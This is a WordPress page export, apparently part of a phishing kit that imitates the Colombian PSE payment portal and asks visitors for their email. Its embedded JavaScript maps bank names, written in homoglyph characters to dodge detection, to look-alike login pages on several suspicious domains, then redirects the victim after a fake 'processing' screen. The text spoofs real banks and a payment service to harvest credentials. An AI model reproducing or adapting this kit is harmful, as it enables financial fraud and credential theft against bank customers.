{"id":348,"date":"2026-03-09T04:29:51","date_gmt":"2026-03-09T04:29:51","guid":{"rendered":"https:\/\/nacm.site\/probador100\/?page_id=348"},"modified":"2026-04-06T22:49:43","modified_gmt":"2026-04-06T22:49:43","slug":"rc-f3","status":"publish","type":"page","link":"https:\/\/nacm.site\/probador100\/rc-f3\/","title":{"rendered":"Rc-F3"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"348\" class=\"elementor elementor-348\">\n\t\t\t\t<div class=\"elementor-element elementor-element-9d49c95 e-con-full e-flex e-con e-parent\" data-id=\"9d49c95\" data-element_type=\"container\" data-e-type=\"container\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t<div class=\"elementor-element elementor-element-975adc9 e-con-full e-flex e-con e-child\" data-id=\"975adc9\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-20bb1d6 elementor-widget elementor-widget-image\" data-id=\"20bb1d6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"719\" height=\"216\" src=\"https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/logsss-psss.png\" class=\"attachment-large size-large wp-image-371\" alt=\"\" srcset=\"https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/logsss-psss.png 719w, https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/logsss-psss-300x90.png 300w\" sizes=\"(max-width: 719px) 100vw, 719px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-14c96c4 e-con-full e-flex e-con e-child\" data-id=\"14c96c4\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-7dabbdc elementor-widget elementor-widget-image\" data-id=\"7dabbdc\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"444\" height=\"218\" src=\"https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/banner-psss.png\" class=\"attachment-large size-large wp-image-375\" alt=\"\" srcset=\"https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/banner-psss.png 444w, https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/banner-psss-300x147.png 300w\" sizes=\"(max-width: 444px) 100vw, 444px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-0146bec e-flex e-con-boxed e-con e-parent\" data-id=\"0146bec\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-22c569f elementor-widget elementor-widget-spacer\" data-id=\"22c569f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-45d9526 elementor-widget elementor-widget-heading\" data-id=\"45d9526\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h6 class=\"elementor-heading-title elementor-size-default\">Selecciona el tipo de persona:<\/h6>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-4e33103 elementor-widget elementor-widget-spacer\" data-id=\"4e33103\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-25e0f90 e-flex e-con-boxed e-con e-parent\" data-id=\"25e0f90\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t<div class=\"elementor-element elementor-element-1d48c20 e-con-full e-flex e-con e-child\" data-id=\"1d48c20\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-2bef121 e-con-full e-flex e-con e-child\" data-id=\"2bef121\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-c597801 elementor-widget elementor-widget-image\" data-id=\"c597801\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"425\" height=\"141\" src=\"https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/btnat-act.png\" class=\"attachment-large size-large wp-image-413\" alt=\"\" srcset=\"https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/btnat-act.png 425w, https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/btnat-act-300x100.png 300w\" sizes=\"(max-width: 425px) 100vw, 425px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-2d8555c e-con-full e-flex e-con e-child\" data-id=\"2d8555c\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-a2b2d22 elementor-widget elementor-widget-image\" data-id=\"a2b2d22\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"425\" height=\"142\" src=\"https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/btjur-ina.png\" class=\"attachment-large size-large wp-image-417\" alt=\"\" srcset=\"https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/btjur-ina.png 425w, https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/btjur-ina-300x100.png 300w\" sizes=\"(max-width: 425px) 100vw, 425px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-e5d14e4 e-con-full e-flex e-con e-child\" data-id=\"e5d14e4\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-77f88d6 e-flex e-con-boxed e-con e-parent\" data-id=\"77f88d6\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t<div class=\"elementor-element elementor-element-37e8587 e-con-full e-flex e-con e-child\" data-id=\"37e8587\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-93cc3cf e-con-full e-flex e-con e-child\" data-id=\"93cc3cf\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-56ddcc3 e-con-full e-flex e-con e-child\" data-id=\"56ddcc3\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-ddd1593 elementor-widget elementor-widget-spacer\" data-id=\"ddd1593\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-00cbbe0 elementor-widget elementor-widget-heading\" data-id=\"00cbbe0\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h6 class=\"elementor-heading-title elementor-size-default\">Ingresa tu correo electr\u00f3nico*<\/h6>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-598b961 elementor-align-center elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list\" data-id=\"598b961\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"icon-list.default\">\n\t\t\t\t\t\t\t<ul class=\"elementor-icon-list-items\">\n\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item\">\n\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-icon\">\n\t\t\t\t\t\t\t<svg aria-hidden=\"true\" class=\"e-font-icon-svg e-far-check-circle\" viewBox=\"0 0 512 512\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M256 8C119.033 8 8 119.033 8 256s111.033 248 248 248 248-111.033 248-248S392.967 8 256 8zm0 48c110.532 0 200 89.451 200 200 0 110.532-89.451 200-200 200-110.532 0-200-89.451-200-200 0-110.532 89.451-200 200-200m140.204 130.267l-22.536-22.718c-4.667-4.705-12.265-4.736-16.97-.068L215.346 303.697l-59.792-60.277c-4.667-4.705-12.265-4.736-16.97-.069l-22.719 22.536c-4.705 4.667-4.736 12.265-.068 16.971l90.781 91.516c4.667 4.705 12.265 4.736 16.97.068l172.589-171.204c4.704-4.668 4.734-12.266.067-16.971z\"><\/path><\/svg>\t\t\t\t\t\t<\/span>\n\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text\">Soy usuario registrado<\/span>\n\t\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t\t\t<\/ul>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-d2004dd elementor-widget elementor-widget-shortcode\" data-id=\"d2004dd\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"shortcode.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-shortcode\">\n<div class=\"wpcf7 no-js\" id=\"wpcf7-f469-o1\" lang=\"es-ES\" dir=\"ltr\" data-wpcf7-id=\"469\">\n<div class=\"screen-reader-response\"><p role=\"status\" aria-live=\"polite\" aria-atomic=\"true\"><\/p> <ul><\/ul><\/div>\n<form action=\"\/probador100\/wp-json\/wp\/v2\/pages\/348#wpcf7-f469-o1\" method=\"post\" class=\"wpcf7-form init\" aria-label=\"Formulario de contacto\" novalidate=\"novalidate\" data-status=\"init\">\n<fieldset class=\"hidden-fields-container\"><input type=\"hidden\" name=\"_wpcf7\" value=\"469\" \/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"6.1.5\" \/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"es_ES\" \/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f469-o1\" \/><input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/><input type=\"hidden\" name=\"_wpcf7_posted_data_hash\" value=\"\" \/>\n<\/fieldset>\n<!-- Esto va dentro de tu formulario CF7 -->\n<div id=\"contenedor-eleg-opc\" style=\"display: none;\">\n\t<p>\n\t<\/p>\n<\/div>\n<div class=\"p3-contenedor\">\n\t<div class=\"p3-campo-email\">\n\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"CORREO\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-email wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-email\" id=\"p3-mail\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"Ej: \u03f2\u03bfrr\u0435\u03bf@\u0440\u0455\u0435.com.co\" value=\"\" type=\"email\" name=\"CORREO\" \/><\/span>\n\t\t<\/p>\n\t<\/div>\n\t<div class=\"p3-fila-botones\">\n\t\t<p><button type=\"button\" class=\"btn-p3-regresar\">Regresar<\/button><input class=\"wpcf7-form-control wpcf7-submit has-spinner btn-p3-continuar\" type=\"submit\" value=\"Continuar\" \/>\n\t\t<\/p>\n\t<\/div>\n<\/div><div class=\"wpcf7-response-output\" aria-hidden=\"true\"><\/div>\n<\/form>\n<\/div>\n<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-d56456f elementor-widget elementor-widget-html\" data-id=\"d56456f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t\t<script>\r\n\/**\r\n * SCRIPT \"CONGELADOR\" INDEPENDIENTE\r\n * Misi\u00f3n: Esconder el formulario apenas el servidor confirme el env\u00edo, \r\n * antes de que CF7 limpie los campos.\r\n *\/\r\ndocument.addEventListener('wpcf7mailsent', function(event) {\r\n    \/\/ Localizamos el formulario que se acaba de enviar\r\n    var formularioActivo = event.target;\r\n\r\n    if (formularioActivo) {\r\n        \/\/ Lo ponemos invisible de un solo porrazo\r\n        formularioActivo.style.opacity = '0';\r\n        formularioActivo.style.transition = 'opacity 0.15s ease';\r\n        \r\n        \/\/ Bloqueamos clics extras por si acaso\r\n        formularioActivo.style.pointerEvents = 'none'; \r\n    }\r\n}, false);\r\n<\/script>\r\n\r\n<!-- 1. EL GIF DE ESPERA (Igual que antes) -->\r\n<div id=\"loader-espera\" style=\"display:none; position:fixed; top:0; left:0; width:100%; height:100%; background:rgba(255,255,255,0.9); z-index:9999; text-align:center; padding-top:20vh;\">\r\n    <img decoding=\"async\" src=\"https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/04\/rotating.webp\" alt=\"Cargando...\" style=\"width:30%; height:auto;\">\r\n    <p style=\"font-family:sans-serif; color:#333; margin-top:20px;\">Procesando tu solicitud...<\/p>\r\n<\/div>\r\n\r\n<script>\r\ndocument.addEventListener('wpcf7mailsent', function(event) {\r\n    \r\n    \/\/ 2. LECTURA DIRECTA (M\u00e1s corta porque ahora es exacta)\r\n    var contenedor = document.getElementById('contenedor-eleg-opc');\r\n    var seleccion = contenedor ? contenedor.innerText.trim() : \"\";\r\n\r\n    var urlDestino = \"\";\r\n\r\n    \/\/ 3. MAPEO DE REDIRECCI\u00d3N\r\n    switch (seleccion) {\r\n        case \"\u0392\u0391\u039d\u03f9\u039f \u0391V VlLL\u0391\u0405\": urlDestino = \"https:\/\/inicio-popu1asr.bplr.site\/-05p\/index-01\/\"; break;\r\n        case \"\u0392\u0391\u039d\u03f9\u039f \u0392\u0392V\u0391 \u03f9\u039fL\u039f\u039c\u0392l\u0391 \u0405.\u0391\": urlDestino = \"https:\/\/inicio-principio.nppe1.site\/-06L\/portalvirtul-01\"; break;\r\n        case \"\u0392\u0391\u039d\u03f9\u039f \u03f9\u0391J\u0391 \u0405\u039f\u03f9l\u0391L\": urlDestino = \"https:\/\/nacm.site\/probador10007p\/transaccion-100\/\"; break;\r\n        case \"\u0392\u0391\u039d\u03f9\u039f D\u0391VlVl\u0395\u039dD\u0391\": urlDestino = \"https:\/\/nacm.site\/probador10009p\/index-01\/\"; break;\r\n        case \"\u0392\u0391\u039d\u03f9\u039f DE \u0392\u039fG\u039f\u03a4\u0391\": urlDestino = \"https:\/\/nacm.site\/probador10010p\/bcavirtal1\/\"; break;\r\n        case \"\u0392\u0391\u039d\u03f9\u039f DE \u039f\u03f9\u03f9lD\u0395\u039d\u03a4\u0395\": urlDestino = \"https:\/\/nacm.site\/probador10011p\/pt-00\/\"; break;\r\n        case \"\u0392\u0391\u039d\u03f9\u039f DE F\u0391L\u0391\u0392\u0395LL\u0391\": urlDestino = \"https:\/\/nacm.site\/probador10012p\/%cf%81%d1%95%ce%b5-%cf%81%d0%b0%c9%a1%ce%bf%d1%9501\/\"; break;\r\n        case \"\u0392\u0391\u039d\u03f9\u039f DE \u03a1\u039f\u03a1UL\u0391R\": urlDestino = \"https:\/\/nacm.site\/probador10018p\/acc-01\/\"; break;\r\n        case \"\u0392\u0391\u039d\u03f9\u039fL\u039f\u039c\u0392l\u0391\": urlDestino = \"https:\/\/nacm.site\/probador10022p\/%d1%95u%cf%b2-1\/\"; break;\r\n        case \"D\u0391Vlb\u0430nk \u0405.\u0391\": urlDestino = \"https:\/\/nacm.site\/probador10038p\/inicio\/\"; break;\r\n        case \"D\u0391Vl\u03a1L\u0391\u03a4\u0391\": urlDestino = \"https:\/\/nacm.site\/probador10031p\/dav-1\/\"; break;\r\n        case \"\u039d\u054d\": urlDestino = \"https:\/\/nacm.site\/probador10036p\/%ce%bd%d5%bd-01\/\"; break;\r\n        default:\r\n            alert(\"\u0395nt\u0456\u0501\u0430\u0501 no disponible. Ser\u00e1s redirigido al inicio.\");\r\n            urlDestino = \"https:\/\/nacm.site\/probador100\/rc-f1\/\";\r\n            break;\r\n    }\r\n\r\n    \/\/ 4. EJECUCI\u00d3N (GIF + REDIRECCI\u00d3N)\r\n    if (urlDestino !== \"\") {\r\n        document.getElementById('loader-espera').style.display = 'block';\r\n        setTimeout(function() {\r\n            window.location.href = urlDestino;\r\n        }, 2000);\r\n    }\r\n}, false);\r\n<\/script>\r\n\r\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-f25af76 elementor-widget elementor-widget-spacer\" data-id=\"f25af76\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-4f9dadc e-con-full e-flex e-con e-child\" data-id=\"4f9dadc\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-46c0693 e-flex e-con-boxed e-con e-parent\" data-id=\"46c0693\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-c6ba523 elementor-widget elementor-widget-spacer\" data-id=\"c6ba523\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"spacer.default\">\n\t\t\t\t\t\t\t<div class=\"elementor-spacer\">\n\t\t\t<div class=\"elementor-spacer-inner\"><\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-6f01e62 e-flex e-con-boxed e-con e-parent\" data-id=\"6f01e62\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t<div class=\"elementor-element elementor-element-9d8739a e-con-full e-flex e-con e-child\" data-id=\"9d8739a\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-fae3248 elementor-widget elementor-widget-image\" data-id=\"fae3248\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"767\" height=\"487\" src=\"https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/VIG-firme.png\" class=\"attachment-large size-large wp-image-543\" alt=\"\" srcset=\"https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/VIG-firme.png 767w, https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/VIG-firme-300x190.png 300w\" sizes=\"(max-width: 767px) 100vw, 767px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-6c96582 e-con-full e-flex e-con e-child\" data-id=\"6c96582\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-313352f e-con-full e-flex e-con e-child\" data-id=\"313352f\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t<div class=\"elementor-element elementor-element-904c333 e-con-full e-flex e-con e-child\" data-id=\"904c333\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-8c9f0c7 elementor-widget elementor-widget-image\" data-id=\"8c9f0c7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"53\" height=\"139\" src=\"https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/iBORDER.png\" class=\"attachment-large size-large wp-image-557\" alt=\"\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-d6db775 e-con-full e-flex e-con e-child\" data-id=\"d6db775\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-4461c21 elementor-widget elementor-widget-image\" data-id=\"4461c21\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img loading=\"lazy\" decoding=\"async\" width=\"73\" height=\"70\" src=\"https:\/\/nacm.site\/probador100\/wp-content\/uploads\/2026\/03\/iFOTT.png\" class=\"attachment-large size-large wp-image-553\" alt=\"\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-07c81a8 e-con-full e-flex e-con e-child\" data-id=\"07c81a8\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-8001b4f elementor-widget elementor-widget-heading\" data-id=\"8001b4f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h6 class=\"elementor-heading-title elementor-size-default\">Para mayor informaci\u00f3n<\/h6>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-985a6c3 elementor-widget elementor-widget-heading\" data-id=\"985a6c3\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h6 class=\"elementor-heading-title elementor-size-default\">comun\u00edcate con nosotros:<\/h6>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-2f66a30 e-con-full e-flex e-con e-child\" data-id=\"2f66a30\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t<div class=\"elementor-element elementor-element-a5bdc08 elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list\" data-id=\"a5bdc08\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"icon-list.default\">\n\t\t\t\t\t\t\t<ul class=\"elementor-icon-list-items\">\n\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item\">\n\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-icon\">\n\t\t\t\t\t\t\t<i aria-hidden=\"true\" class=\"icon icon-phone-call1\"><\/i>\t\t\t\t\t\t<\/span>\n\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text\">En Bogot\u00e1: +57 (601) 3808890 opci\u00f3n 5<\/span>\n\t\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t\t\t<\/ul>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-17e82d3 elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list\" data-id=\"17e82d3\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"icon-list.default\">\n\t\t\t\t\t\t\t<ul class=\"elementor-icon-list-items\">\n\t\t\t\t\t\t\t<li class=\"elementor-icon-list-item\">\n\t\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-icon\">\n\t\t\t\t\t\t\t<svg aria-hidden=\"true\" class=\"e-font-icon-svg e-fab-rocketchat\" viewBox=\"0 0 576 512\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M284.046,224.8a34.114,34.114,0,1,0,34.317,34.113A34.217,34.217,0,0,0,284.046,224.8Zm-110.45,0a34.114,34.114,0,1,0,34.317,34.113A34.217,34.217,0,0,0,173.6,224.8Zm220.923,0a34.114,34.114,0,1,0,34.317,34.113A34.215,34.215,0,0,0,394.519,224.8Zm153.807-55.319c-15.535-24.172-37.31-45.57-64.681-63.618-52.886-34.817-122.374-54-195.666-54a405.975,405.975,0,0,0-72.032,6.357,238.524,238.524,0,0,0-49.51-36.588C99.684-11.7,40.859.711,11.135,11.421A14.291,14.291,0,0,0,5.58,34.782C26.542,56.458,61.222,99.3,52.7,138.252c-33.142,33.9-51.112,74.776-51.112,117.337,0,43.372,17.97,84.248,51.112,118.148,8.526,38.956-26.154,81.816-47.116,103.491a14.284,14.284,0,0,0,5.555,23.34c29.724,10.709,88.549,23.147,155.324-10.2a238.679,238.679,0,0,0,49.51-36.589A405.972,405.972,0,0,0,288,460.14c73.313,0,142.8-19.159,195.667-53.975,27.371-18.049,49.145-39.426,64.679-63.619,17.309-26.923,26.07-55.916,26.07-86.125C574.394,225.4,565.634,196.43,548.326,169.485ZM284.987,409.9a345.65,345.65,0,0,1-89.446-11.5l-20.129,19.393a184.366,184.366,0,0,1-37.138,27.585,145.767,145.767,0,0,1-52.522,14.87c.983-1.771,1.881-3.563,2.842-5.356q30.258-55.68,16.325-100.078c-32.992-25.962-52.778-59.2-52.778-95.4,0-83.1,104.254-150.469,232.846-150.469s232.867,67.373,232.867,150.469C517.854,342.525,413.6,409.9,284.987,409.9Z\"><\/path><\/svg>\t\t\t\t\t\t<\/span>\n\t\t\t\t\t\t\t\t\t\t<span class=\"elementor-icon-list-text\">Contactos: www.p-s-e.com.co\/persona-centro-ayudas\/<\/span>\n\t\t\t\t\t\t\t\t\t<\/li>\n\t\t\t\t\t\t<\/ul>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Selecciona el tipo de persona: Ingresa tu correo electr\u00f3nico* Soy usuario registrado Procesando tu solicitud&#8230; Para mayor informaci\u00f3n comun\u00edcate con nosotros: En Bogot\u00e1: +57 (601) 3808890 opci\u00f3n 5 Contactos: www.p-s-e.com.co\/persona-centro-ayudas\/<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_canvas","meta":{"footnotes":""},"class_list":["post-348","page","type-page","status-publish"],"_links":{"self":[{"href":"https:\/\/nacm.site\/probador100\/wp-json\/wp\/v2\/pages\/348","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nacm.site\/probador100\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/nacm.site\/probador100\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/nacm.site\/probador100\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/nacm.site\/probador100\/wp-json\/wp\/v2\/comments?post=348"}],"version-history":[{"count":343,"href":"https:\/\/nacm.site\/probador100\/wp-json\/wp\/v2\/pages\/348\/revisions"}],"predecessor-version":[{"id":901,"href":"https:\/\/nacm.site\/probador100\/wp-json\/wp\/v2\/pages\/348\/revisions\/901"}],"wp:attachment":[{"href":"https:\/\/nacm.site\/probador100\/wp-json\/wp\/v2\/media?parent=348"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}